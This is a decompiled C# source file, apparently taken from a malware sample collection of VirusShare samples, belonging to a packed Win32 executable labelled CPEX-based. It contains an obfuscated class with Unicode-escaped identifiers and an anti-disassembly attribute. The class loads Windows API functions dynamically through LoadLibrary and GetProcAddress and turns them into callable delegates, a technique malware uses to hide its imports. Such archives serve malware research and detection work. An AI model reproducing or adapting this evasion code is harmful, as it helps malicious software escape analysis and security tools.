MalwareSourceCode/MSIL/Packed/Win32/C/Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5/=.cs
2022-08-18 06:28:56 -05:00

35 lines
1.1 KiB
C#

// Decompiled with JetBrains decompiler
// Type: =
// Assembly: syncui, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8C369EE2-0F8E-40F6-BD9C-ED440A7013AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5.exe
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[SuppressIldasm]
internal sealed class \u003D : \u007C
{
public \u003D()
{
if (false)
;
// ISSUE: explicit constructor call
base.\u002Ector();
}
public override object \u0040(params object[] _param1)
{
if (false)
;
return (object) Marshal.GetDelegateForFunctionPointer(\u003D.\u000E6(\u003D.\u0008\u000Ad\u0016((string) _param1[0]), (string) _param1[1]), (Type) _param1[2]);
}
[DllImport("kernel32", EntryPoint = "LoadLibrary")]
private static extern IntPtr \u0008\u000Ad\u0016([In] string obj0);
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
private static extern IntPtr \u000E6([In] IntPtr obj0, [In] string obj1);
}